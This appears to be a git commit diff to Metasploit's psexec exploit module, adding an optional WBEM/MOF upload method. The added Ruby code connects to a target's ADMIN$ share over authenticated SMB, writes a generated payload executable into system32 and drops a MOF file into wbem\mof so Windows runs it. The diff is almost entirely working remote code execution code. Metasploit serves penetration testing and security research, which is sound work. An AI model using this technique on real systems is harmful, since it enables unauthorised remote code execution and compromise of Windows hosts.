add wbem exec method for psexec as optional, fix #3972, thanks to pbk-df3 for patch
git-svn-id: file:///home/svn/framework3/trunk@12171 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
b823ea9876
commit
3a6a02e43c
|
@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::SMB::Authenticated
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::WbemExec
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -85,7 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true])
|
||||
OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
|
||||
OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -127,6 +129,34 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
report_auth_info(report_hash)
|
||||
end
|
||||
|
||||
if datastore['MOF_UPLOAD_METHOD']
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if datastore['SHARE'] != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect("ADMIN$")
|
||||
filename = rand_text_alpha(8) + ".exe"
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect("ADMIN$")
|
||||
else
|
||||
filename = rand_text_alpha(8) + ".exe"
|
||||
servicename = rand_text_alpha(8)
|
||||
|
||||
|
@ -306,7 +336,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
raise $!
|
||||
rescue ::Exception
|
||||
end
|
||||
|
||||
end
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue